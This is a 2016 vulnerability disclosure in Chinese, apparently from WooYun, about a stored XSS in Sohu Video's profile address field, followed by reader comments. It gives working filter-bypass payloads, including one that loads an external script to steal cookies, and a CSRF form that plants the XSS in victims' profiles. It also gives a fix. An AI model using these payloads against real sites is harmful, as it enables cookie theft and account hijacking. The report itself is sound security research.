漏洞概要

缺陷编号: 2016-195079

漏洞标题: 搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

相关厂商: 搜狐

漏洞作者: px1624

提交时间: 2016-04-12 09:36

公开时间: 2016-05-27 10:20

漏洞类型: XSS 跨站脚本攻击

危害等级: 高

自评Rank: 18

漏洞状态: 厂商已经确认

漏洞来源: [email protected]

Tags标签: xss xss利用技巧 csrf 搜狐视频


漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

简要描述:

有详细的分析过程,绕过限制得需要一定的基础~

详细说明:

漏洞缺陷位置:基本资料 - 个人资料 - 通讯地址: http://my.tv.sohu.com/user/setting/basic.do



然后测试后发现,这里过滤了常见的script关键字,还有尖括号 >< ,单引号 ' ,圆括号 ) (



测试了一番后,绕过了这些过滤,成功弹窗。



payload:

code 区域
xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx





代码执行流程如下图箭头所示:

1.jpg





然后尝试写入外部js文件,测试后发现有200字节的长度限制,注意一下过滤的那些东西,我直接给出payload吧。



code 区域
xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx





如下图,成功写入代码,生成调用外部js文件的js代码,获取cookie~



2.jpg





3.jpg





4.jpg



漏洞证明:

这里做下简单的说明,为什么payload要这么写呢?



1 由于过滤了尖括号><,所以只能在input标签内部构造,input标签最好用的xss事件就是onfocus了

2 由于过滤了圆括号(),所以用 location=url编码 的这种模式可以将括号写为%28 %29

3 由于过滤了单引号',所以location='alert%271%28'这样就不能用了,所以利用this.name进行传值

4 script关键字有过滤,所以用sCript大小写混淆绕过



基本就这样了吧,综上就可以得出上面的payload了~



下面再说下CSRF漏洞,因为这里的单一XSS漏洞没有什么意义,只是个selfxss自己x自己的。

然后这里的post保存请求没有验证referer,所以可以CSRF,2者结合起来就可以X别人了。

中招CSRF就直接埋下了持久的XSS后门。



这里直接给出可以埋下,调用任意外部js文件,的CSRF的poc代码:



code 区域
<form id="csrfdemo" action="http://my.tv.sohu.com/user/profile/basic_update.do" method="POST">
<input type='hidden' name='nickname' value='test12341478524'><input type='hidden' name='sex' value='0'><input type='hidden' name='usermail' value=''><input type='hidden' name='year' value='0000'><input type='hidden' name='month' value='00'><input type='hidden' name='day' value='00'><input type='hidden' name='city1' value='0'><input type='hidden' name='usersign' value=''><input type='hidden' name='address' value='xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx'><input type='hidden' name='postcode' value=''>
</form>
<button onclick="document.getElementById('csrfdemo').submit()">测试</button>



修复方案:

XSS 把剩下唯一没过滤的双引号,再过滤下就行了

CSRF 验证referer信息

版权声明:转载请注明来源 乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-04-12 10:10

厂商回复:

感谢支持!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-04-12 10:17 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)
    1

    小厂商 2分,醉了~~

    1# 回复此人
  2. 2016-04-13 13:27 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)
    1

    @px1624 搜狐咋也小厂商了

    2# 回复此人
  3. 2016-05-27 10:21 | 酷帥王子 ( 普通白帽子 | Rank:270 漏洞数:74 | 天之屌,人之神!天人合一,乃屌神也!绝对...)
    1

    没想到过滤<>竟然搞得有声有色,666不错

    3# 回复此人
  4. 2016-05-27 10:25 | 重瞳 ( 路人 | Rank:11 漏洞数:2 | 我是重瞳)
    1

    @酷帥王子 哈哈哈

    4# 回复此人
  5. 2016-05-27 11:40 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)
    0

    洞主,那个收Cookie的是什么工具呀。

    5# 回复此人
  6. 2016-05-27 11:50 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)
    0

    @酷帥王子 过滤尖括号是最常见的……

    6# 回复此人
  7. 2016-05-27 11:51 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)
    0

    @dragon110 最一般的xsser.me

    7# 回复此人
  8. 2016-05-27 11:56 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)
    0

    @px1624 谢谢大神解答。

    8# 回复此人
  9. 2016-05-28 16:10 | 酷帥王子 ( 普通白帽子 | Rank:270 漏洞数:74 | 天之屌,人之神!天人合一,乃屌神也!绝对...)
    0

    PX牛,这个漏洞算是给大家科普了,以前一直以为过滤<>都无法玩了,就放弃了今天第二次看,百看不厌

    9# 回复此人
  10. 2016-05-29 23:02 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)
    0

    @酷帥王子 http://wooyun.org/bugs/wooyun-2010-0167250 这个过滤的更严格~

    10# 回复此人